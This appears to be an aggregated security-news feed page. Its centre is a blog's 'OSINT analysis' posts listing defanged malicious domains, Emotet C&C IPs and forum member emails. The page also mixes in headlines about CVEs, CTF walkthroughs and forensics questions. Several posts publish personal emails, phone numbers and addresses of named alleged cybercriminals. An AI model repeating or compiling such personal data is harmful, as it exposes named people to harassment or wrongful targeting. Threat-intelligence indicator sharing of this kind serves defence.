    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: shadow@shadowcrew[.]com idline@ziplip[.]com vengeance_1@ziplip[.]com cracker81@ziplip[.]com den5013@ziplip[.]com onthefringe@ziplip[.]com midhack@ziplip[.]com toastypimp@yahoo[.]com fakeid@ziplip[.]com anonraider@hotmail[.]com KsnowyInc@ziplip[.]com spookycat911@ziplip[.]com Necromancer01@ziplip[.]com script4dumps@ukr[.]net dominican@ziplip[.]com rcwizard@ziplip[.]com CAYMAN@Veg…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: 61[.]153[.]225[.]253 61[.]156[.]17[.]164 61[.]159[.]174[.]31 216[.]12[.]218[.]213 61[.]172[.]195[.]167 1[.]3[.]5[.]112 61[.]175[.]211[.]198 64[.]82[.]92[.]118 218[.]62[.]16[.]38 61[.]151[.]251[.]199 61[.]158[.]185[.]39 213[.]98[.]75[.]135 5[.]3[.]2[.]34 211[.]147[.]61[.]151 64[.]82[.]91[.]117 212[.]181[.]134[.]31 194[.]226[.]242[.]33 217[.]126[.]111[.]6 61[.]172[.]247[.]85 212[.]57[.]166[…
    The Evolution of Encrypted IM Messenging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue fake tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue fraudulent and malicious tech support scam domains include: 0120-hfjkahgfu-238[.]cf 1-800-my-apple[.]org 1serversupport[.]com 2serversupport[.]com 3serversupport[.]com 3stepremoval[.]com 4serversupport[.]com 5serversupport[.]com 6serversupport[.]com 7serversupport[.]com 8serversupport[.]com 9inchmonster[.]us 9serversupport[.]com 11serversupport[.]com 22serversupport[.]com 24-7helpline[.]co[.]uk 24hour-apple-support[.]org 24techhelp[.]com 24x7livesolution[.]com 33host[.]net 33serversupport[.]com 44serversupport[.]com 55serversupport[.]com 66serversupport[.]com 77serversupp…
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on Iran's based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: Name: Mohammad Sagegh Ahmadzadegan Handle: Nitrojen26 Email: nitr0jen26@asia[.]com; Nitrojen26@yahoo[.]com; me@sadahm[.]net Web Site: hxxp://sadahm[.]com Social Media Accounts: https://twitter[.]com/nitrojen26 Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer in-depth and practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. shy4angels@gmail[.]com shahzadsmb@gmail[.]com khizarh11@yahoo[.]com khizarhayat[.]jaffri@yahoo[.]com muhammadkhizar[.]hayatjaffri@yahoo[.]com mygreentree59@yahoo[.]com khizar14hayat@gmail[.]com muhammadkhizarhayatjaffri@yahoo[.]com threatcc@gmail[.]com mujtaba@forwarderz[.]com syedaliraza940@gmail[.]com raza[.]zaidi92@yahoo[.]com kool_boy92@hotmail[.]com s[.]alirz92@gmail[.]com alimohsin228@gmail[.]com mohsinrazaamiri@gmail[.]com alimohsin228@yahoo[.]com amestypezx@yahoo[.]com mohsin@forwarderz[.]com great_guy1102002@yahoo[.]com support@secondeyesolution[.]com info@forwarderz[.]com forwarderz@yahoo[.]com forwarderzlive@google[.]com forwarderzlive@hotmail[.]com support@secondeyehost[.]com Sample Web sites known to have been used by Forwarderz and  SecondEye Solution:  hxxp://secondeyesolution[.]su hxxp:// secondeyesolution[.]ch hxxp:// secondeyesolution[.]ru hxxp:// secondeyesolution[.]com hxxp:// forwarderz[.]com hxxp:// secondeyehost[.]com Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels including actual currently active names of RATs (Remote Access Tools) and trojan horses wit the idea to assist everyone in their cyber attack and cyber attribution campaigns where the C&C (Command and Control) communications channels which I'll share exclusive rely and use static and dynamic DNS and IP providers for the actual C&C infrastructure which is a common TTP (Tactics Techniques and Procedures) for this type of malicious software releases. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns[.] Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[…
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's  Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: m0stagim@gmail[.]com mtn97[.]hacker@yahoo[.]com si13nt_si13nt@yahoo[.]com midia595@yahoo[.]com Dead[.]Zone@att[.]net n0_sec@yahoo[.]it MagicC0d3r@gmail[.]com Faghat_be_khatere_to6000@yahoo[.]com raminshahkar73@yahoo[.]com nitr0jen26@asia[.]com Lord[.]private@ymail[.]com mehdy007@hotmail[.]fr plus[.]ashiyane@gmail[.]com pashe_kosh9@yahoo[.]com omid[.]ghaffarinia@gmail[.]com Pashekosh8@gmail[.]com pashe_kosh8@yahoo[.]com Sun[.…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[.]…
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers,   I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: 008i[.]com 008k[.]com 00hq[.]com 010402[.]com 05p[.]com 0calories[.]net 0cat[.]com 0cj[.]net 100gal[.]net 100sexlinks[.]com 101lottery[.]com 1089288654 10money[.]us 123keno[.]com 130[.]94[.]72[.]17 143fuck[.]com 157[.]238[.]62[.]14 171203[.]com 193[.]125[.]201[.]50 195[.]190[.]118[.]140 195[.]225[.]176[.]14 195[.]225[.]176[.]31 195[.]225[.]177[.]13 195[.]225[.]177[.]8 198[.]65[.]164[.]168 198[.]65[.]164[.]170 198[.]65[.]164[.]171 1check[.]us 1cost[.]us 1-domains-…
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns in the context of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: Mobile: +380993082660 Phone: 1-800-225-5324 which is actually the phone number of the FBI Personal email address accounts: yarik45@gmail[.]com, yaroslav2468@mail[.]ru Online handles: Yarik45, Yaroslav2468 ICQ: 635995970 including the following Web site which is he known to have been offering around…
  • Open

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak [link] [comments]  ( 1 min )
  • Open

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum Continue reading on Medium »  ( 7 min )
    Try Hack Me’s OhSint:A Walkthrough
    ​Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe.This room is a lot of fun! Continue reading on Medium »  ( 2 min )
  • Open

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders [link] [comments]  ( 1 min )
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000

  • Open

    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/ Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down and have since learned that IACRB is now dissolved. InfoSec says that the certification will be now issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing show any clout previously and will this now be lost? submitted by /u/FormerFive0 [link] [comments]  ( 2 min )
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB Hdds. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and strip size combinations but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event logs analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc) Would like to seek advise from those who had previously encountered such exhibits and how you managed to retrieve log records. Would running KAPE on a host network pc targeting the network drive or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools be useful here? submitted by /u/Drako880 [link] [comments]  ( 2 min )
    Did Encase support linux/docker forensic
    Which Encase enpack can we get memory of Linux physical machine and docker memory? Which are the Linux forensic artifacts support by Encase besides user login/bash history/process/network info, any Enpack can use? Did Encase provide timeline analysis for linux image/Docker image? submitted by /u/cyberfo [link] [comments]  ( 1 min )
  • Open

    Anyone have a good list of people to follow on twitter for security updates? Preferably ones that have a lot of technical content.
    I know twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security. Appsec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0 [link] [comments]  ( 1 min )
    what is the best way to cleanse a PC?
    I'm no tech buff so sorry if I'm asking all the wrong questions. but when I was living with family my siblings would test out their spyware hacks on my laptop/phone's I remember on the laptop I could tell when they were trying something because it would start acting funny and on startup or mid session there would be a couple cmd boxes that would appear run something and close out by themselves. recently I'm seeing the same type of things happening mainly on my GF's laptop but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. my question is how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past but that would only last long enough for whatever i deleted to redownload then ill be having the same symptoms all over again. sorry for the broad description like i said I'm not that tech savvy but thanks for you guys time and hopefully can point me in the right direction. much appreciated! submitted by /u/Questionable_Qs_2655 [link] [comments]  ( 2 min )
    How does clicking a email link result in installing malware?
    Can someone explain exactly how clicking on a link on a email can install malware on device? submitted by /u/LagunaLoireFF8 [link] [comments]  ( 1 min )
    How do you manage auxiliary AD accounts password expiration ?
    For example, separated admin accounts in an Active Directory without interactive logons (run-as) : you don't get interactive notifications about password expiration for that account... ho do you manage this ? script ? submitted by /u/arnaudluti [link] [comments]  ( 2 min )
    Why should sensitive documents not be sent via Email?
    Why do people advise against sending sensitive documents via Email? submitted by /u/Linux98 [link] [comments]  ( 2 min )
  • Open

    CVE-2021-4034
    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0  ( 4 min )
  • Open

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell [link] [comments]
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh [link] [comments]
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3 [link] [comments]  ( 1 min )
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti [link] [comments]
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te [link] [comments]
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3 [link] [comments]
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0  ( 10 min )
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0  ( 8 min )
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0  ( 1 min )
  • Open

    vulnhub之DC-6靶机渗透详细过程
    非常详细的DC-6靶机渗透过程,仅供大家一起学习、交流。  ( 1 min )
    FreeBuf早报 | Tor项目起诉一俄罗斯法院;英国拟向儿童科普DDoS攻击后果
    英国国家犯罪局(NCA)的网络犯罪部门正在着手进行一项旨在教育儿童了解 DDoS 攻击后果的计划。  ( 1 min )
    美国《提升国家安全、国防和情报系统网络安全备忘录》全文翻译及解读
    本文从发布背景、六大亮点与业界反响三个方面解读美国总统拜登签署的《提升国家安全、国防和情报系统网络安全备忘录》(NSM)。  ( 1 min )
    渗透测试之高效信息搜集(整合)
    几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?  ( 2 min )
    美国政府正式发布零信任战略,拟在2024财年前实现特定目标
    在整个政府范围内启动零信任框架迁移,大幅降低针对联邦政府数字基础设施的网络攻击风险。
    python_mmdt:ssdeep、tlsh、vhash、mmdthash对比(六)
    本文通过400个测试文件的关联性分析对比,对比ssdeep、tlsh、vhash、mmdthash之间的效果差异。  ( 3 min )
    实现CobaltStrike上线短信提醒【没用的技巧又增加了】
    叮,您有新的主机上线,请查收哦!  ( 1 min )
    中央网信办等10部门发布《数字乡村发展行动计划(2022-2025年)》
    《行动计划》围绕发展目标,从8个方面部署了26项重点任务。
    【情报工具】分享24个国内外政府开放数据平台
    开放数据(Open Data),尤其是政府的开放数据(Government Open Data),是一类重要的但仍未被妥善开发利用的庞大资源。  ( 1 min )
    Linux Polkit Root权限提升漏洞(CVE-2021-4034)
    polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。  ( 1 min )
    《Gartner 2022年网络防火墙关键能力报告》发布,Fortinet获得三大用例最高得分
    世界经济论坛预估,2022年全球网络犯罪支出将达到惊人的2.2万亿美元。  ( 1 min )
  • Open

    SecWiki News 2022-01-27 Review
    2021年物联网设备CVE天梯榜 by ourren Flare-On 8th两道题目复现 by ourren 应急响应-Yara规则木马检测 by ourren ISOON2021 线下域渗透题解 by ourren 去中心化上线CS by ourren 漏洞监控平台——Monitor by ourren 聊聊API安全的重要性及治理思路 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-27 Review
    2021年物联网设备CVE天梯榜 by ourren Flare-On 8th两道题目复现 by ourren 应急响应-Yara规则木马检测 by ourren ISOON2021 线下域渗透题解 by ourren 去中心化上线CS by ourren 漏洞监控平台——Monitor by ourren 聊聊API安全的重要性及治理思路 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Tìm những bug trên Symfony
    Cre:How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Kindle You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Deskripsi Book  Celebrate your little cuddle… Continue reading on Medium »  ( 2 min )
    웁살라시큐리티, Nakji Network와 총 20만 달러 버그 바운티 진행
    Uppsala Security(웁살라시큐리티)는 블록체인 온체인 데이터 인덱싱 프로젝트인 Nakji Network(Nakji Network)와 버그 바운티 프로그램을 함께 합니다. Continue reading on Medium »  ( 2 min )
  • Open

    Threat Assessment: BlackCat Ransomware
    BlackCat ransomware (aka ALPHV) is notable for its use of the Rust programming language and an aggressive approach to naming and shaming victims. The post Threat Assessment: BlackCat Ransomware appeared first on Unit42.
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ ​ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Goverment, Stego, Crypto multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
    컬리넌 로그 #26입니다. XXE 항목 추가하였습니다. 보통 컬리넌에 여러개 이력이 누적되면 올리려곤 하는데, 이번에는 텀이 좀 길어져서 로그로 올려봅니다. XXE 내용 중 대응방안 쪽은 OWASP가 워낙 잘 정리해서 거의 링크 하나로 대체된 상태인데, 요건 제가 따로 한번 더 자세히 정리해서 업데이트하도록 할게요 😅 Add XXE (XML External Entity)
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns. mlibo[.]ml blibo[.]ga azll[.]cf azlll[.]cf lzll[.]cf jlll[.]cf elll[.]cf lllib[.]cf tsll[.]cf ulll[.]tk tlll[.]cf libt[.]ga libk[.]ga libf[.]ga libe[.]ga liba[.]gq libver[.]ml ntll[.]tk ills[.]cf vtll[.]cf clll[.]tk stll[.]tk llii[.]xyz lill[.]pro eduv[.]icu univ[.]red unir[.]cf unir[.]gq unisv[.]xyz unir[.]ml unin[.]icu unie[.]ml unip[.]gq unie[.]ga unip[.]cf nimc[.]ga nimc[.]ml savantaz[.]cf unie[.]gq unip[.]ga unip[.]ml unir[.]ga untc[.]me jhbn[.]me unts[.]me uncr[.]me lib-service[.]com unvc[.]me untf[.]me nimc[.]cf anvc[.]me ebookfafa[…
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns. Name: Behrooz Kamalian Postal address: Tajrish Sq, Fana Khosro St,Amir Salam Alley,No 22, Ashiyane ICT Company Phone number: 22727284-5 Fax number: 22727283 email: nima.salehi@yahoo.com Technical Handle: nic36928h37 Name: Behrooz Kamalian email: nima.salehi@yahoo.com Domain Name: ashiyane.ir Legal Holder: Behrooz Kamalian Postal address: Unit 28, Floor Seven, 36 Building , Daneshvar alley, Jamalzadeh St. , Enghelab Sq. Tehran, IR 1336925748 Phone number: +98.2166935551 Fax number: +98.2166930577 Admin Contact: nic36928h37 Technical Contact: nic36928h37 Domain Name Server1: ns1.ashiyane.org Domain Name Server2: ns2.ashiyane.org Request Date: 29 December 2005 Last Verification: 21 September 2006 Reseller: Govah Tadbir Rayaneh Postal address: Unir 1 , 1th Floor , No.376 , North Bahar St . Phone number: +98 21 88849956-7 Fax number: +98 21 88307682 email: info@tadbir.ir
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs: hxxp://109[.]123[.]78[.]10 hxxp://66[.]54[.]51[.]172 hxxp://108[.]161[.]128[.]103 hxxp://195[.]210[.]29[.]237 hxxp://5[.]35[.]249[.]46 hxxp://5[.]159[.]57[.]195 hxxp://206[.]210[.]70[.]175 hxxp://88[.]80[.]187[.]139 hxxp://188[.]93[.]174[.]136 hxxp://130[.]133[.]3[.]7 hxxp://162[.]144[.]79[.]192 hxxp://79[.]110[.]90[.]207 hxxp://72[.]18[.]204[.]17 hxxp://212[.]129[.]13[.]…

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you light enjoy it. 📌 TL;DR ZAP has powerful scripting engine and automation Burpsuite has powerful scanning engine and That’s Early adopter. They’re both really cool tools. 🔍 Compare ZAP Burpsuite Proxy O , HTTP/1.1 O🎖 HTTP/1.1 , HTTP/2 Paasive Scan O O Active Scan O O Scan Configuration O🎖, Easy, Detail control O Scan Results O, Mapping more information O, Detail results Live Scan O, ATTACK Mode O, Live tasks Manage scope O, Detail O, Easy Manage workspace O O Spidering O, Spider, Ajax Spider O, Powerful Crawler Extensions (Addons) O, High quality O🎖, High quality, Many features Scripting O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc O, Python, Ruby Performance O, Fast, bu…
    XXE (XML External Entity)
